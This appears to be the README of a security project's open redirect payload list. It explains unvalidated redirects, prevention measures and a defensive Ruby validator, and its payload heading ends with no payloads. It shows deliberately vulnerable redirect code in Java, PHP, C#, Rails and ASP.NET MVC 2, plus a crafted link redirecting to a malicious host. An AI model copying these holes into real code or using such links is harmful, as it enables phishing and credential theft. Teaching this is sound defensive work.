
payloadbox / Open Redirect Payload List

Licence: mit
🎯 Open Redirect Payload List


Open Redirect Payload List

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.

Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Java :

response.sendRedirect("http://www.mysite.com");  

PHP :

<?php
/* Redirect browser */
header("Location: http://www.mysite.com");
?>

ASP .NET :

Response.Redirect("~/folder/Login.aspx")

Rails :

redirect_to login_path

In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

Dangerous URL Redirects

The following examples demonstrate unsafe redirect and forward code.

Dangerous URL Redirect Example 1

The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:

response.sendRedirect(request.getParameter("url"));

The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL:

$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);

A similar example of C# .NET Vulnerable Code:

string url = Request.QueryString["url"];
Response.Redirect(url);

And in Rails:

redirect_to params[:url]

The above code is vulnerable to an attack if no validation or extra method controls are applied to verify the validity of the URL. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.

If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:

http://example.com/example.php?url=http://malicious.example.com

The user sees a link that points to the original trusted site (example.com) and does not realize that a redirection could take place.

Dangerous URL Redirect Example 2

ASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to apply MVC 3.

The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.

ASP.NET MVC 2 LogOn action in AccountController.cs (see Microsoft Docs link provided above for the context):

[HttpPost]
 public ActionResult LogOn(LogOnModel model, string returnUrl)
 {
   if (ModelState.IsValid)
   {
     if (MembershipService.ValidateUser(model.UserName, model.Password))
     {
       FormsService.SignIn(model.UserName, model.RememberMe);
       if (!String.IsNullOrEmpty(returnUrl))
       {
         return Redirect(returnUrl);
       }
       else
       {
         return RedirectToAction("Index", "Home");
       }
     }
     else
     {
       ModelState.AddModelError("", "The user name or password provided is incorrect.");
     }
   }

   // If we got this far, something failed, redisplay form
   return View(model);
 }

Preventing Unvalidated Redirects and Forwards

Safe use of redirects and forwards can be done in a number of ways:

  • Simply avoid using redirects and forwards.
  • If used, do not allow the URL as user input for the destination. This can usually be done. In this case, you should have a method to validate the URL.
  • If user input can’t be avoided, ensure that the supplied value is valid, appropriate for the application, and is authorized for the user.
  • It is recommended that any such destination input be mapped to a value, rather than the actual URL or portion of the URL, and that server side code translate this value to the target URL.
  • Sanitize input by creating a list of trusted URLs (lists of hosts or a regex).
  • Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm.
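
One way to apply the mapping and trusted-list points above, and the kind of check the returnUrl in the LogOn action lacks, as an added Ruby example (not code from the payloadbox project or its sources). DESTINATIONS, TRUSTED_HOSTS, FALLBACK, the function names and the hostnames are hypothetical; the example goes slightly beyond the text by also refusing targets that stop being local once percent-decoded.

```ruby
require "uri"

# Constructed sample data; every name and hostname here is hypothetical.
DESTINATIONS = {
  "home"    => "/",
  "account" => "/account/settings",
  "docs"    => "https://docs.example.com/start"
}.freeze
TRUSTED_HOSTS = ["docs.example.com", "status.example.com"].freeze
FALLBACK = "/"
MAX_DECODE_LAYERS = 3

# Mapping approach: the request carries a short token, never a URL.
# Unknown tokens (including anything URL-shaped) get the fallback.
def destination_for(token)
  DESTINATIONS.fetch(token.to_s, FALLBACK)
end

# Browsers strip control characters and treat "\" like "/" when resolving a
# Location value, so a validator must refuse them rather than ignore them.
def suspicious_chars?(str)
  str.each_char.any? { |c| c.ord < 0x20 || c.ord == 0x7f || c == "\\" }
end

# A local target is a single-slash absolute path: "/x" yes, "//x" no.
def local_path?(str)
  str.valid_encoding? && str.start_with?("/") && !str.start_with?("//") &&
    !suspicious_chars?(str)
end

# Returns the input unchanged when it, and every percent-decoded layer of it,
# is a local path; otherwise nil. Decoding is checked because a later
# component may decode the value before it is written to the Location header.
def local_redirect(value)
  raw = value.to_s
  form = raw
  MAX_DECODE_LAYERS.times do
    return nil unless local_path?(form)
    decoded = URI.decode_www_form_component(form)
    return raw if decoded == form   # nothing left to decode, all layers local
    form = decoded
  end
  nil                               # still encoded after several layers: refuse
rescue ArgumentError
  nil                               # malformed percent-encoding: refuse
end

# Accepts an absolute URL only if it is https, on the default port, carries no
# userinfo, and its host is an exact (not substring or regex) match.
def trusted_absolute(value)
  str = value.to_s
  return nil unless str.valid_encoding? && !suspicious_chars?(str)
  uri = URI.parse(str)
  return nil unless uri.is_a?(URI::HTTPS)
  return nil unless uri.userinfo.nil? && uri.port == 443
  return nil unless TRUSTED_HOSTS.include?(uri.host.to_s.downcase)
  uri.to_s
rescue URI::Error
  nil
end

# Validation approach: used only when a URL parameter cannot be avoided.
def safe_redirect_target(value)
  local_redirect(value) || trusted_absolute(value) || FALLBACK
end
```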

Open Redirect Payload List :

